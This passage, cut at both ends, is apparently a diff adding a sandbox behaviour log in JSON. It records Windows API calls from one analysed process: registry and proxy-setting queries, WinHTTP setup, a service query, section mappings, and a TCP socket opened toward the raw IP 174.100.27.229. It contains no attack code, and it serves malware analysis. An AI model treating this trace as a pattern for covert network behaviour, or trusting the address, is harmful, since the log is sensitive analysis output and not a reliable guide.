"repeated": 0, + "id": 1155 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "8196", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x0000046c" + }, + { + "name": "ValueName", + "value": "AutoDetect" + }, + { + "name": "FullName", + "value": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\AutoDetect" + } + ], + "repeated": 0, + "id": 1156 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "8196", + "caller": "0x756ae44b", + "parentcaller": "0x7332fe3b", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x0000046c" + } + ], + "repeated": 0, + "id": 1157 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "8196", + "caller": "0x756ba38d", + "parentcaller": "0x733a3c6c", + "category": "process", + "api": "NtOpenSection", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "SectionHandle", + "value": "0x000004bc" + }, + { + "name": "DesiredAccess", + "value": "0x00000004" + }, + { + "name": "ObjectAttributes", + "value": "Global\\F932B6C7-3A20-46A0-B8A0-8894AA421973" + } + ], + "repeated": 0, + "id": 1158 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "8196", + "caller": "0x756c563b", + "parentcaller": "0x733a3c83", + "category": "process", + "api": "NtMapViewOfSection", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "SectionHandle", + "value": "0x000004bc" + }, + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x04c10000" + }, + { + "name": "SectionOffset", + "value": "0x056bf760" + }, + { + "name": "ViewSize", + "value": "0x00001000" + }, + { + "name": "Win32Protect", + "value": "0x00000002", + "pretty_value": "PAGE_READONLY" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 1159 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "8196", + "caller": "0x733a4ecb", + "parentcaller": "0x733309e7", + "category": "network", + "api": "WinHttpOpen", + "status": true, + "return": "0x007ea2b0", + "arguments": [ + { + "name": "UserAgent", + "value": "" + }, + { + "name": "ProxyName", + "value": "" + }, + { + "name": "ProxyBypass", + "value": "" + }, + { + "name": "AccessType", + "value": "0x00000001" + }, + { + "name": "Flags", + "value": "0x10000000" + } + ], + "repeated": 0, + "id": 1160 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "8196", + "caller": "0x73331eb3", + "parentcaller": "0x73331c87", + "category": "network", + "api": "WinHttpSetOption", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "InternetHandle", + "value": "0x052a6400" + }, + { + "name": "Option", + "value": "0x0000002d" + }, + { + "name": "Buffer", + "value": "\\x08\\xa4)\\x05" + } + ], + "repeated": 0, + "id": 1161 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "8196", + "caller": "0x756ad931", + "parentcaller": "0x756ad70b", + "category": "misc", + "api": "RtlSetCurrentTransaction", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "TransactionHandle", + "value": "0x00000000" + } + ], + "repeated": 1, + "id": 1162 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "8196", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000000" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x0000011c" + }, + { + "name": "ObjectAttributesName", + "value": "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\WinHttp" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\WinHttp" + } + ], + "repeated": 0, + "id": 1163 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "8196", + "caller": "0x7705baf4", + "parentcaller": "0x739fc6d5", + "category": "system", + "api": "NtQueryLicenseValue", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Name", + "value": "Kernel-OneCore-DeviceFamilyID" + }, + { + "name": "Type", + "value": "0x00000004" + } + ], + "repeated": 0, + "id": 1164 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "8196", + "caller": "0x756ad931", + "parentcaller": "0x756ac98b", + "category": "misc", + "api": "RtlSetCurrentTransaction", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "TransactionHandle", + "value": "0x00000000" + } + ], + "repeated": 1, + "id": 1165 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "8196", + "caller": "0x756fcf49", + "parentcaller": "0x756ac9db", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x000004cc" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x0000011c" + }, + { + "name": "ObjectAttributesName", + "value": "Software\\Microsoft\\windows\\CurrentVersion\\Internet Settings" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\windows\\CurrentVersion\\Internet Settings" + } + ], + "repeated": 0, + "id": 1166 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "8196", + "caller": "0x756fc5aa", + "parentcaller": "0x756acf9e", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x000004cc" + }, + { + "name": "ValueName", + "value": "WinHttpLowerCaseHost" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\WinHttpLowerCaseHost" + } + ], + "repeated": 0, + "id": 1167 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "8196", + "caller": "0x756ae44b", + "parentcaller": "0x739fc4ff", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x000004cc" + } + ], + "repeated": 0, + "id": 1168 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "8196", + "caller": "0x7334c060", + "parentcaller": "0x7334b989", + "category": "system", + "api": "GetSystemTimeAsFileTime", + "status": true, + "return": "0x00000000", + "arguments": [], + "repeated": 2, + "id": 1169 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "8196", + "caller": "0x73a0ed9e", + "parentcaller": "0x739f3e84", + "category": "services", + "api": "OpenSCManagerW", + "status": true, + "return": "0x007442c0", + "arguments": [ + { + "name": "MachineName", + "value": "" + }, + { + "name": "DatabaseName", + "value": "" + }, + { + "name": "DesiredAccess", + "value": "0x00000001", + "pretty_value": "SC_MANAGER_CONNECT" + } + ], + "repeated": 0, + "id": 1170 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "8196", + "caller": "0x73a0edb9", + "parentcaller": "0x739f3e84", + "category": "services", + "api": "OpenServiceW", + "status": true, + "return": "0x007442e8", + "arguments": [ + { + "name": "ServiceControlManager", + "value": "0x007442c0" + }, + { + "name": "ServiceName", + "value": "WinHttpAutoProxySvc" + }, + { + "name": "DesiredAccess", + "value": "0x00000094", + "pretty_value": "SERVICE_QUERY_STATUS|SERVICE_START|SERVICE_INTERROGATE" + } + ], + "repeated": 0, + "id": 1171 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "8196", + "caller": "0x756b90b8", + "parentcaller": "0x75096ff4", + "category": "threading", + "api": "NtOpenThread", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ThreadHandle", + "value": "0x000004d0" + }, + { + "name": "DesiredAccess", + "value": "0x00100010", + "pretty_value": "THREAD_SET_CONTEXT|0x00100000" + }, + { + "name": "ProcessId", + "value": "9436" + }, + { + "name": "ThreadId", + "value": "8196" + } + ], + "repeated": 0, + "id": 1172 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "8196", + "caller": "0x756b8b4a", + "parentcaller": "0x75097fbf", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x000004d0" + } + ], + "repeated": 0, + "id": 1173 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "8196", + "caller": "0x756b8b4a", + "parentcaller": "0x73a0ecf3", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x000004cc" + } + ], + "repeated": 0, + "id": 1174 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "8196", + "caller": "0x756b8c89", + "parentcaller": "0x739ecb7a", + "category": "system", + "api": "NtWaitForSingleObject", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x000004cc" + }, + { + "name": "Milliseconds", + "value": "18446744073709551615" + }, + { + "name": "Status", + "value": "Infinite" + } + ], + "repeated": 0, + "id": 1175 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "8196", + "caller": "0x770225b6", + "parentcaller": "0x77021fc0", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x000004d4" + } + ], + "repeated": 0, + "id": 1176 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "8196", + "caller": "0x770225b6", + "parentcaller": "0x77021fc0", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x000004d8" + } + ], + "repeated": 0, + "id": 1177 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "8196", + "caller": "0x7335d6d6", + "parentcaller": "0x7338784c", + "category": "system", + "api": "GetSystemTimeAsFileTime", + "status": true, + "return": "0x00000000", + "arguments": [], + "repeated": 0, + "id": 1178 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "8196", + "caller": "0x756b8b4a", + "parentcaller": "0x73a35097", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x000004c8" + } + ], + "repeated": 0, + "id": 1179 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "8196", + "caller": "0x756b8b4a", + "parentcaller": "0x739f2629", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x000004c4" + } + ], + "repeated": 0, + "id": 1180 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "8196", + "caller": "0x756b8b4a", + "parentcaller": "0x73a350ec", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x000004cc" + } + ], + "repeated": 0, + "id": 1181 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "8196", + "caller": "0x770225b6", + "parentcaller": "0x770269b6", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x000004d0" + } + ], + "repeated": 0, + "id": 1182 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "6332", + "caller": "0x756b8236", + "parentcaller": "0x7553ab4f", + "category": "system", + "api": "LdrLoadDll", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Flags", + "value": "0x00000000" + }, + { + "name": "FileName", + "value": "C:\\Windows\\System32\\mswsock.dll" + }, + { + "name": "BaseAddress", + "value": "0x6db80000" + } + ], + "repeated": 0, + "id": 1183 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "6332", + "caller": "0x756b8236", + "parentcaller": "0x7553ab4f", + "category": "network", + "api": "GetAddrInfoExW", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Name", + "value": "174.100.27.229" + }, + { + "name": "ServiceName", + "value": "" + } + ], + "repeated": 0, + "id": 1184 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "6332", + "caller": "0x7337e0ec", + "parentcaller": "0x7337e077", + "category": "network", + "api": "WSASocketW", + "status": true, + "return": "0x0000046c", + "arguments": [ + { + "name": "af", + "value": "2", + "pretty_value": "AF_INET" + }, + { + "name": "type", + "value": "1", + "pretty_value": "SOCK_STREAM" + }, + { + "name": "protocol", + "value": "6", + "pretty_value": "IPPROTO_TCP" + }, + { + "name": "socket", + "value": "1132" + } + ], + "repeated": 0, + "id": 1185 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "6332", + "caller": "0x756b8c89", + "parentcaller": "0x756b8be2", + "category": "system", + "api": "GetSystemTimeAsFileTime", + "status": true, + "return": "0x00000000", + "arguments": [], + "repeated": 0, + "id": 1186 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "6332", + "caller": "0x756b8c89", + "parentcaller": "0x756b8be2", + "category": "system", + "api": "NtWaitForSingleObject", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x000003b8" + }, + { + "name": "Milliseconds", + "value": "0" + } + ], + "repeated": 0, + "id": 1187 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "6332", + "caller": "0x756b8c89", + "parentcaller": "0x756b8be2", + "category": "system", + "api": "GetSystemTimeAsFileTime", + "status": true, + "return": "0x00000000", + "arguments": [], + "repeated": 0, + "id": 1188 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "6332", + "caller": "0x756b8c89", + "parentcaller": "0x756b8be2", + "category": "system", + "api": "NtWaitForSingleObject", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x000003b8" + }, + { + "name": "Milliseconds", + "value": "0" + } + ], + "repeated": 0, + "id": 1189 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "6332", + "caller": "0x7703540b", + "parentcaller": "0x756b854e", + "category": "filesystem", + "api": "NtQueryAttributesFile", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "FileName", + "value": "C:\\Windows\\System32\\mswsock.dll" + } + ], + "repeated": 0, + "id": 1190 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "6332", + "caller": "0x77041fb0", + "parentcaller": "0x77028de8", + "category": "registry", + "api": "NtOpenKey", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000000" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000000" + }, + { + "name": "ObjectAttributesName", + "value": "\\Registry\\Machine\\Software\\Microsoft\\LanguageOverlay\\OverlayPackages\\es-ES" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\LanguageOverlay\\OverlayPackages\\es-ES" + } + ], + "repeated": 0, + "id": 1191 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "6332", + "caller": "0x7702934b", + "parentcaller": "0x770297b2", + "category": "filesystem", + "api": "NtOpenFile", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "FileHandle", + "value": "0x00000000" + }, + { + "name": "DesiredAccess", + "value": "0x00100001", + "pretty_value": "FILE_READ_ACCESS|SYNCHRONIZE" + }, + { + "name": "FileName", + "value": "C:\\Windows\\System32\\es-ES\\mswsock.dll.mui" + }, + { + "name": "ShareAccess", + "value": "5", + "pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE" + } + ], + "repeated": 0, + "id": 1192 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "6332", + "caller": "0x7702934b", + "parentcaller": "0x770297b2", + "category": "filesystem", + "api": "NtOpenFile", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "FileHandle", + "value": "0x000004b4" + }, + { + "name": "DesiredAccess", + "value": "0x00100001", + "pretty_value": "FILE_READ_ACCESS|SYNCHRONIZE" + }, + { + "name": "FileName", + "value": "C:\\Windows\\sysnative\\es-ES\\mswsock.dll.mui" + }, + { + "name": "ShareAccess", + "value": "5", + "pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE" + } + ], + "repeated": 0, + "id": 1193 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "6332", + "caller": "0x770297fc", + "parentcaller": "0x770292de", + "category": "process", + "api": "NtCreateSection", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "SectionHandle", + "value": "0x000004b8" + }, + { + "name": "DesiredAccess", + "value": "0x000f0005", + "pretty_value": "STANDARD_RIGHTS_REQUIRED|SECTION_QUERY|SECTION_MAP_READ" + }, + { + "name": "ObjectAttributes", + "value": "" + }, + { + "name": "FileHandle", + "value": "0x000004b4" + } + ], + "repeated": 0, + "id": 1194 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "6332", + "caller": "0x77029824", + "parentcaller": "0x770292de", + "category": "process", + "api": "NtMapViewOfSection", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "SectionHandle", + "value": "0x000004b8" + }, + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x04c20000" + }, + { + "name": "SectionOffset", + "value": "0x0557d918" + }, + { + "name": "ViewSize", + "value": "0x00004000" + }, + { + "name": "Win32Protect", + "value": "0x00000002", + "pretty_value": "PAGE_READONLY" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 1195 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "6332", + "caller": "0x77029834", + "parentcaller": "0x770292de", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x000004b8" + } + ], + "repeated": 0, + "id": 1196 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "6332", + "caller": "0x7703540b", + "parentcaller": "0x756b854e", + "category": "filesystem", + "api": "NtQueryAttributesFile", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "FileName", + "value": "C:\\Windows\\System32\\mswsock.dll" + } + ], + "repeated": 4, + "id": 1197 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "6332", + "caller": "0x7703540b", + "parentcaller": "0x756b854e", + "category": "filesystem", + "api": "NtQueryAttributesFile", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "FileName", + "value": "C:\\Windows\\System32\\wshqos.dll" + } + ], + "repeated": 0, + "id": 1198 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "6332", + "caller": "0x756b6fdb", + "parentcaller": "0x756b6ade", + "category": "filesystem", + "api": "NtCreateFile", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "FileHandle", + "value": "0x000004b8" + }, + { + "name": "DesiredAccess", + "value": "0x80100080", + "pretty_value": "GENERIC_READ|FILE_READ_ATTRIBUTES|SYNCHRONIZE" + }, + { + "name": "FileName", + "value": "C:\\Windows\\System32\\wshqos.dll" + }, + { + "name": "CreateDisposition", + "value": "1", + "pretty_value": "FILE_OPEN" + }, + { + "name": "ShareAccess", + "value": "5", + "pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE" + }, + { + "name": "FileAttributes", + "value": "0x00000000" + }, + { + "name": "ExistedBefore", + "value": "yes" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 1199 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "6332", + "caller": "0x756b85fa", + "parentcaller": "0x756b82a7", + "category": "process", + "api": "NtCreateSection", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "SectionHandle", + "value": "0x000004d0" + }, + { + "name": "DesiredAccess", + "value": "0x00000005", + "pretty_value": "SECTION_QUERY|SECTION_MAP_READ" + }, + { + "name": "ObjectAttributes", + "value": "" + }, + { + "name": "FileHandle", + "value": "0x000004b8" + } + ], + "repeated": 0, + "id": 1200 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "6332", + "caller": "0x756b8643", + "parentcaller": "0x756b82a7", + "category": "process", + "api": "NtMapViewOfSection", + "status": true, + "return": "0x40000003", + "arguments": [ + { + "name": "SectionHandle", + "value": "0x000004d0" + }, + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x05940000" + }, + { + "name": "SectionOffset", + "value": "0x00000000" + }, + { + "name": "ViewSize", + "value": "0x00007000" + }, + { + "name": "Win32Protect", + "value": "0x00000002", + "pretty_value": "PAGE_READONLY" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 1201 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "6332", + "caller": "0x756b869b", + "parentcaller": "0x756b82a7", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x000004d0" + } + ], + "repeated": 0, + "id": 1202 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "6332", + "caller": "0x756b86a2", + "parentcaller": "0x756b82a7", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x000004b8" + } + ], + "repeated": 0, + "id": 1203 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "6332", + "caller": "0x77041fb0", + "parentcaller": "0x77028de8", + "category": "registry", + "api": "NtOpenKey", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000000" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000000" + }, + { + "name": "ObjectAttributesName", + "value": "\\Registry\\Machine\\Software\\Microsoft\\LanguageOverlay\\OverlayPackages\\es-ES" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\LanguageOverlay\\OverlayPackages\\es-ES" + } + ], + "repeated": 0, + "id": 1204 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "6332", + "caller": "0x7702934b", + "parentcaller": "0x770297b2", + "category": "filesystem", + "api": "NtOpenFile", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "FileHandle", + "value": "0x00000000" + }, + { + "name": "DesiredAccess", + "value": "0x00100001", + "pretty_value": "FILE_READ_ACCESS|SYNCHRONIZE" + }, + { + "name": "FileName", + "value": "C:\\Windows\\System32\\es-ES\\wshqos.dll.mui" + }, + { + "name": "ShareAccess", + "value": "5", + "pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE" + } + ], + "repeated": 0, + "id": 1205 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "6332", + "caller": "0x770293dc", + "parentcaller": "0x770297b2", + "category": "filesystem", + "api": "NtOpenFile", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "FileHandle", + "value": "0x000004b8" + }, + { + "name": "DesiredAccess", + "value": "0x00100001", + "pretty_value": "FILE_READ_ACCESS|SYNCHRONIZE" + }, + { + "name": "FileName", + "value": "C:\\Windows\\sysnative\\es-ES\\wshqos.dll.mui" + }, + { + "name": "ShareAccess", + "value": "5", + "pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE" + } + ], + "repeated": 0, + "id": 1206 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "6332", + "caller": "0x770297fc", + "parentcaller": "0x770292de", + "category": "process", + "api": "NtCreateSection", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "SectionHandle", + "value": "0x000004d0" + }, + { + "name": "DesiredAccess", + "value": "0x000f0005", + "pretty_value": "STANDARD_RIGHTS_REQUIRED|SECTION_QUERY|SECTION_MAP_READ" + }, + { + "name": "ObjectAttributes", + "value": "" + }, + { + "name": "FileHandle", + "value": "0x000004b8" + } + ], + "repeated": 0, + "id": 1207 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "6332", + "caller": "0x77029824", + "parentcaller": "0x770292de", + "category": "process", + "api": "NtMapViewOfSection", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "SectionHandle", + "value": "0x000004d0" + }, + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x05950000" + }, + { + "name": "SectionOffset", + "value": "0x0557d918" + }, + { + "name": "ViewSize", + "value": "0x00001000" + }, + { + "name": "Win32Protect", + "value": "0x00000002", + "pretty_value": "PAGE_READONLY" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 1208 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "6332", + "caller": "0x77029834", + "parentcaller": "0x770292de", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x000004d0" + } + ], + "repeated": 0, + "id": 1209 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "6332", + "caller": "0x7704a4ca", + "parentcaller": "0x7704a400", + "category": "process", + "api": "NtUnmapViewOfSection", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x05950000" + }, + { + "name": "RegionSize", + "value": "0x00001000" + } + ], + "repeated": 0, + "id": 1210 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "6332", + "caller": "0x7704a4d8", + "parentcaller": "0x7704a400", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x000004b8" + } + ], + "repeated": 0, + "id": 1211 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "6332", + "caller": "0x756b697c", + "parentcaller": "0x7553904d", + "category": "process", + "api": "NtUnmapViewOfSection", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x05940000" + }, + { + "name": "RegionSize", + "value": "0x00007000" + } + ], + "repeated": 0, + "id": 1212 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "6332", + "caller": "0x7703540b", + "parentcaller": "0x756b854e", + "category": "filesystem", + "api": "NtQueryAttributesFile", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "FileName", + "value": "C:\\Windows\\System32\\wshqos.dll" + } + ], + "repeated": 0, + "id": 1213 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "6332", + "caller": "0x756b6fdb", + "parentcaller": "0x756b6ade", + "category": "filesystem", + "api": "NtCreateFile", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "FileHandle", + "value": "0x000004b8" + }, + { + "name": "DesiredAccess", + "value": "0x80100080", + "pretty_value": "GENERIC_READ|FILE_READ_ATTRIBUTES|SYNCHRONIZE" + }, + { + "name": "FileName", + "value": "C:\\Windows\\System32\\wshqos.dll" + }, + { + "name": "CreateDisposition", + "value": "1", + "pretty_value": "FILE_OPEN" + }, + { + "name": "ShareAccess", + "value": "5", + "pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE" + }, + { + "name": "FileAttributes", + "value": "0x00000000" + }, + { + "name": "ExistedBefore", + "value": "yes" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 1214 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "6332", + "caller": "0x756b85fa", + "parentcaller": "0x756b82a7", + "category": "process", + "api": "NtCreateSection", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "SectionHandle", + "value": "0x000004d0" + }, + { + "name": "DesiredAccess", + "value": "0x00000005", + "pretty_value": "SECTION_QUERY|SECTION_MAP_READ" + }, + { + "name": "ObjectAttributes", + "value": "" + }, + { + "name": "FileHandle", + "value": "0x000004b8" + } + ], + "repeated": 0, + "id": 1215 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "6332", + "caller": "0x756b8643", + "parentcaller": "0x756b82a7", + "category": "process", + "api": "NtMapViewOfSection", + "status": true, + "return": "0x40000003", + "arguments": [ + { + "name": "SectionHandle", + "value": "0x000004d0" + }, + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x05940000" + }, + { + "name": "SectionOffset", + "value": "0x00000000" + }, + { + "name": "ViewSize", + "value": "0x00007000" + }, + { + "name": "Win32Protect", + "value": "0x00000002", + "pretty_value": "PAGE_READONLY" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 1216 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "6332", + "caller": "0x756b869b", + "parentcaller": "0x756b82a7", + "category": "system", + "api": "NtClose", + "status": 